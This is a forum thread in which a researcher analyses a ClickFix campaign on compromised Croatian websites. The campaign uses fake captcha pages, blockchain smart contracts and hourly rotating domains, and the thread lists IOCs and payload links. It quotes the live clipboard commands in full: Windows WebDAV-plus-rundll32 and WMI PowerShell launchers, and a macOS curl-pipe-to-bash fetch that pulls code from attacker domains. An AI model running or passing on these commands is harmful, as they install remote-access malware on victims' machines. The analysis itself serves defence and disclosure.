[HR] video-studio-vrbanus.hr - pronađen izuzetno sofisticiran ClickFix na sajtu
#1

Ovaj sajt prikazuje clickfix prevaru, prvo zaista pokaže stranicu sajta pa je onda zamagli i prikaže lažnu captcha stranicu :

   

pa kada se klikne :

   

u klipbord stavlja :

Code:
conhost.exe --headless --inheritcursor --width 80 --height 30 -- cmd /v:on /c "set a=pu&set b=shd&set c=run&set d=dll32&for %x in (!a!!b!) do @%x \\ibkgsks.oxiidbet[.]com@SSL@443\d75bb7f9-6c7c-40fe-88be-4979d11cd854 & !c!!d! gc.key,#1"

koju AI opisuje kao :

Quote:1. Hidden console opens
2. Mounts remote WebDAV share from attacker's server
3. Downloads/accesses gc.key (malicious DLL)
4. Executes it using rundll32
5. Payload runs (RAT, info stealer, etc.)



Ovaj clickfix mi je uzeo dosta vremena za analizu, izuzetno je sofisticiran i upao sam u zečiju rupu...

U kôdu index stranice postoji ubrizgan kôd koji je dobijen sa BSC Testnet blokčejna...

   

Adresa ovog pametnog ugovora https://testnet.bscscan.com/address/0xA1...0baf727d2e

ovaj kôd DeepSeek AI objašnjava ovako :

   

ALI ovaj domen spartanac.let je suspendovan preko mesec dana što znači da ovo nije kôd koji pokazuje trenutni clickfix nego neki prethodni a samo je ostala logika koja ga još uvek ubrizgava u index stranicu ovog sajta.

Download link koji je u ovom kôdu koji nije pravi ClickFix ove stranice je :

Code:
$request = [Net.WebRequest]::Create('https://spartanec[.]lat/api/index.php?a=dl&token=8caaf953d89478b8a7191eb32295c117a310b53ac9059d4ad69a1e397ec3b2d4&src=fotomedia.hr&mode=cloudflare');

primetićete src=fotomedia.hr a to nije ovaj sajt nego drugi sajt koji sam skoro analizirao. To ga povezuje sa tom drugom clickfix kompromitacijom koja ide preko Polygon blokčejna a koristila je isti ovaj domen spartanec.lat : fotomedia.hr - clickfix 


Ovo gore je sve besmisleno jer sajt-žrtva uopšte ne izvršava ovaj kôd a i očigledno je pametan ugovor koji se koristio za ovo napušten i nije skoro ažuriran. Ovo je verovatno neka starija i odvojena ClickFix kompromitacija ili je od istih ovih aktera koji su se prebacili na novo.

A to novo je ludo... posle ovoga gore koje se više ne koristi šalje drugi upit na BSC Testnet blokčejn :

   

adresa ovog pametnog ugovora je https://testnet.bscscan.com/address/0x46...91d23383Ff i ovaj je i te kako aktivan.

Odavde učitava kôd za ovu clickfix stranicu koju gledamo na sajtu. Kôd je izuzetno zamagljen i dobija se Base64 enkodiran koji u sebi ima još Base64 enkodovanog sadržaja.

Ostaviću DeepSeeku da objasni šta se dešava  :

Complete Attack Chain Visualization

Code:
┌─────────────────────────────────────────────────────────────────────┐ │                    1. USER VISITS COMPROMISED PAGE                  │ └─────────────────────────────────────────────────────────────────────┘                                     ↓ ┌─────────────────────────────────────────────────────────────────────┐ │              2. BOT DETECTION (bypasses crawlers)                   │ │  - Checks navigator.webdriver                                       │ │  - Checks HeadlessChrome, PhantomJS, Puppeteer                      │ │  - Checks window size                                               │ └─────────────────────────────────────────────────────────────────────┘                                     ↓ ┌─────────────────────────────────────────────────────────────────────┐ │              3. SMART CONTRACT QUERY (BSC Testnet)                  │ │  - Contract: 0xf4a32588b50a59a82fbA148d436081A48d80832A             │ │  - Function: 0x24513bb6(userId)                                     │ │  - Returns: "yes" or "no"                                           │ └─────────────────────────────────────────────────────────────────────┘                                     ↓ ┌─────────────────────────────────────────────────────────────────────┐ │                   4. USER TRACKING                                  │ │  - Sets cookie "cjs_id"                                             │ │  - Generates UUID v4 for tracking                                   │ │  - Sends to Yandex Metrica                                          │ └─────────────────────────────────────────────────────────────────────┘                                     ↓ ┌─────────────────────────────────────────────────────────────────────┐ │              5. FAKE CAPTCHA DISPLAYED                              │ │  - Shows "I'm not a robot"                                          │ │  - "Complete these Verification Steps"                               │ │  - Instructions: Win+R → Ctrl+V → Enter                             │ └─────────────────────────────────────────────────────────────────────┘                                     ↓ ┌─────────────────────────────────────────────────────────────────────┐ │              6. MALICIOUS PAYLOAD EXECUTED                          │ │  - User pastes from clipboard                                       │ │  - Runs PowerShell/HTA/MSHTA command                                │ │  - Malware installed                                                │ └─────────────────────────────────────────────────────────────────────┘                                     ↓ ┌─────────────────────────────────────────────────────────────────────┐ │              7. SUCCESS TRACKED                                     │ │  - Yandex Metrica records conversion                                │ │  - "reachGoal" event sent                                           │ │  - Attackers know it worked                                         │ └─────────────────────────────────────────────────────────────────────┘

   

   


E sad neke bitne stvari...

  1. Odgovor pametnog ugovora od kojeg se dobija kôd u kojem se nalazi i domen sa kojeg skida payload se menja na svakih sat vremena! Svakih 60min dobijamo novi zamagljeni kôd i drugačiji domen. Svaki sajt kompromitovan ovim ClickFixom šalje upit na blokčejn da dobije novi kôd sa domenom+poddomenom odakle skida payload. Domeni su uglavnom registrovani pre nekog vremena i nisu sveži, a poddomen je proizvoljno generisan i mislim da je nebitno šta je samo da je 7 karaktera.
  2. Starom iskorišćenom domenu se gasi DNS posle tih sat vremena njegovog korišćenja i efektivno više ne postoji - teško ako ne i nemoguće je analizirati bilo šta u ovakvoj situaciji.
  3. Od domena koje sam ispratio ni jedan nema detekcije na VT niti su generalno ni skenirani preko VT ili URLScan jer su kratkog trajanja a nije moguće skenirati kada je poddomen ugašen.
  4. Navodno zlonamerni kôd ima jednu detekciju na VT-u. Dobije se mamac payload ako se URL ne otvori na adekvatan način.
  5. Ovo je izuzetno kompleksan i sofisticiran ClickFix napad dizajniran da se teško može otkriti ili analizirati automatskim metodama.



Vratimo se na "SMART CONTRACT QUERY" u gornjem opisu lanca napada

"UserID" koji ClickFix skripta šalje na upit pametnom ugovoru je IP adresa posetioca sajta, a odgovor koji dobija je "No" ili "Yes"

Ako je odgovor "No" onda se posetiocu prikazuje lažna Captcha stranica, ako je "Yes" onda se ne pokazuje. Ovo dodatno uverava posetioca da je sve prošlo ok sa "verifikacijom" i da sada može da vidi sajt, veoma lukavo.

Tvorac ovog ClickFixa odnosno automatika koja ga tehnički podržava popunjava ovaj pametan ugovor sa novim IP adresama uređaja koji su uspešno preuzeli payload sa datog URLa da im ne bi i dalje iskakao clickfix na sajtu. 
Zapravo lažna ClickFix stranica nestane čim se skine payload jer u pozadini konstantno šalje upit na blokčejn da li je IP adresa Yes ili No. Ovo tera posetioca da misli da je uspešno odradio "verifikaciju" dok je u stvari pokrenuo malver na svom računaru.

Adresa ovog pametnog ugovora i njegove transakcije: https://testnet.bscscan.com/address/0xf4...a48d80832a

Ovo takođe znači da možemo da vidimo IP adrese uređaja koji su uspešno preuzeli payload! Ali to ćemo pregledati drugi put, LLM mi pravi skriptu da izvlačim te transakcije iz BSC Testneta i IP adrese iz njih.



Payload koji se dobije sa adrese ako se pristupi preko pretraživača ili nečeg neočekivanog je potpuno legitiman DLL potpisan sa validnim NVIDIA sertifikatom :

https://www.virustotal.com/gui/file/f110...8e820c98c6

Ali kada se fajl preuzme preko PowerShella kako i očekuje dobije se potpuno drugi fajl :

https://www.virustotal.com/gui/file/99db...?nocache=1

   


Complete IOC List

Code:
Type Value Contract 0xf4a32588b50a59a82fbA148d436081A48d80832A Function 0x24513bb6 (IP/user check) RPC bsc-testnet-rpc.publicnode.com Tracker mc.yandex.ru/metrika/tag.js Metrics ID 99162160 Avast IP Check ip-info.ff.avast.com/v2/info Font Awesome use.fontawesome.com/releases/v5.0.0/css/all.css Cookie cjs_id UI Classes _rIwk87zJ, _SMwyORvP, _pSGrZZ3z, _itM2Vhkj, _Kla7YB4A

domeni koje sam otkrio koji su se menjali na svakih sat vremena dok sam analizirao ovaj ClickFix :

Code:
1xbeet.vip 1xbeet.site 1bonus.bet 1bet1yek.bet sargarminovin.ir oxiidbet.com
Reply
#2

Drugi sajtovi obuhvaćeni istom ovom clickfix kampanjom :

luxury.rent-a-car.hr
proizvodnja-peka.com
Reply
#3

analiza konačnog payloada koji se izvršava na računaru :

https://tria.ge/260707-lp951abz8r

   

izgleda da se C2 sa kojim komunicira payload nalazi na adresi edge.kernelmonitor.cc

Sve vezano za ovaj ClickFix je iza Cloudflare-a naravno
Reply
#4

Još jedno otkriće... na istom sajtu ako mu se pristupi sa Apple računara dobije se ClickFix prilagođen za tu platformu :

   

Ovde pita drugačiji BSC Testnet pametni ugovor za podatke : https://testnet.bscscan.com/address/0x68...dd1feb11a5

Takođe proverava IP adresu posetioca na isti pametni ugovor kao i ClickFix za Windos.

I ovaj pametni ugovor održava ista adresa kao i druga dva identifikovana pametna ugovora (jedan za windows i jedan za proveru IP adrese)

Komanda koju šalje u klipbord na MacOSu je :

Code:
/bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL '8i3va94n.milliardbet[.]com/?ublib=27e2ba21-24e7-4832-9540-4cd692882f01')"; echo ""BotGuard: Answer the protector challenge. Ref: 73282

Uspeo sam i da izvučem ovu prvu fazu koja se skida sa ovog gore URLa. Dobije se zamagljeni AppleScript koji:

  1. Šalje upit na Polygon blokčejn pametni ugovor sa adresom https://polygonscan.com/address/0xA3a603...8F7C15C2A0
  2. Dobije nazad domen skriven u pametnom ugovoru (u ovom trenutku apdhlhs3.xyz)
  3. Dalje sa ovog domena preuzima dodatni AppleScript koji pokreće

Trenutni domen je suspendovan pa nisam mogao dalje da idem. 7 dana nije ažuriran domen na pametnom ugovoru, moguće je da je završena deo kampanje za MacOS ili imaju neke probleme, pratiću ako postave novi domen.

Domeni postavljeni na ovaj pametni ugovor: 

Code:
apdhlhs3.xyz johncon.my bduwih8.pro sj98xe4.xyz hf98x4d.site citcix6.xyz gesck4m.pro xuiaxwx.com
Reply
#5

video-studio-vrbanus.hr je očišćen od ClickFixa

luxury.rent-a-car.hr doduše nije...

   

Koristi iste BSC testnet pametne ugovore da preuzme ClickFix kôd kao i da proveri da li je IP adresa već "odrađena"

kopirana komanda se promenila, sada je :

Code:
pcalua.exe -a "powershell" -c "$s=([wmiclass]'Win32_ProcessStartup').CreateInstance();$s.ShowWindow=0;([wmiclass]'Win32_Process').Create('cmd /v/c pushd \\vgmxlrqi.site-shartbandi-pasor.online@SSL\31667ea0-2fce-4b99-a691-da50e63c58cc & rundll32 gz.keu,#1',$null,$s)"

Payload se takođe promenio :

https://www.virustotal.com/gui/file/06f6.../detection

   

domeni koji su se izmenjali dok sam analizirao :

Code:
vgmxlrqi.site-shartbandi-pasor.online hxjqzgav.taktikkbet.com gityegkd.taktikkbet.com
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)